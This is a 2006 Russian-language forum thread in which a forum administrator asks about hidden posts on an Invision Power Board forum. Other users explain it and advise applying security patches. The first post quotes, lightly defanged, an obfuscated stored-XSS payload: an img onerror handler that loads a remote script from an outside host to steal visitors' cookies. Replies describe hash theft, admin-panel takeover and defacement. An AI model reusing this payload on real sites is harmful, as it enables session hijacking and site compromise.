okiska Опубликовано 14 Декабря 2006 Жалоба Поделиться Опубликовано 14 Декабря 2006 Здравствуйте!Не знаю, к какой теме это относится, но мне очень нужна ваша помощь.На нашем форуме один "добрый человек" периодически оставляет сообщения со скрытым текстом. Т.е. если открыть сообщение для редактирования, то его видно, а так нет. Я его привела ниже в неактивном виде (добавила лишние пробелы). Что это за зверь, чем нам это грозит и что делать? img src="http://www.antichat.ru/[snap back] onerror=sc_ript=doc ument.createElement(String.fro mCharCode(115,99,114,105,112,116)),sc_ript.src=/http:xxunde rwater.cup.suxipbxya.js/.sou rce.replace(/x/g,String.fromCharCode(47)),head=docum ent.getElementsByTagName(String.from CharCode(104,101,97,100)).item(0),head.appendChild(sc_ript) style=visib ility:hidden =[/snapb ack].gif" border="0" alt="Изображение" Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 14 Декабря 2006 Жалоба Поделиться Опубликовано 14 Декабря 2006 Грузит скрипт с underwater.cup.su/ipb/ya.jsСнял, посмотрел: куки тащит. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Aliance spb Опубликовано 14 Декабря 2006 Жалоба Поделиться Опубликовано 14 Декабря 2006 Обновление безопасности в IPB 2.1.x (17.10.06) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
okiska Опубликовано 14 Декабря 2006 Автор Жалоба Поделиться Опубликовано 14 Декабря 2006 Грузит скрипт с underwater.cup.su/ipb/ya.jsСнял, посмотрел: куки тащит. А чем это серьезным то грозит? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Aliance spb Опубликовано 14 Декабря 2006 Жалоба Поделиться Опубликовано 14 Декабря 2006 В куках содержится твой хэш. Зная твой хеш можно:1) зайти на форум под твоим логином2) если ты имеешь доступ в АП, расшифровав твой хеш, можно зайти тобой в АП А если уже хакер попадет в АП, то он скорее всего сможет залить свой шелл и тогда сделать дефэйс всего сайта. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
okiska Опубликовано 15 Декабря 2006 Автор Жалоба Поделиться Опубликовано 15 Декабря 2006 Другими словами, если я админ этого форума, то все в итоге будет коту под хвост. Печально.(ругательства вырезаны ) А как от этого защититься? В данном случае и чтобы этого в будущем не было. Ваша ссылка поможет?У нас на форуме регистрация не обязательная. В первый раз он зарегился, а второй раз оставил сообщение под гостем. А как быстро действует данный скрипт? И по какому принципу: надо щелкнуть на сообщении или автоматом. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Valera Опубликовано 15 Декабря 2006 Жалоба Поделиться Опубликовано 15 Декабря 2006 А как от этого защититься? Вам уже писали, или у вас проблемы со зрением? Что это за скрипт? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Aliance spb Опубликовано 15 Декабря 2006 Жалоба Поделиться Опубликовано 15 Декабря 2006 То, что у тебя - это сниффер, он ворует куки всех, кто откроет страницу с этим кодом и посылает их на удаленныйц сервер скрипту. Видимо, там они сохраняются, не в курсе. Далее, может легко зайти под вашим логином. А если комп мощный - расшифровать ваш пароль (или если ваш пароль легкий и состоит из мал. кол-ва цифр) Защищаться от этого нужно путем установления всего, что пишется в разделе новости. И ставить версии стабильные - 1.3, 2.1.7 Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
okiska Опубликовано 15 Декабря 2006 Автор Жалоба Поделиться Опубликовано 15 Декабря 2006 Спасибо, добрый человек. А почему 2.1.6 нестабильная? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Master Опубликовано 15 Декабря 2006 Жалоба Поделиться Опубликовано 15 Декабря 2006 Ну главное все исправления безопасности сделать Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.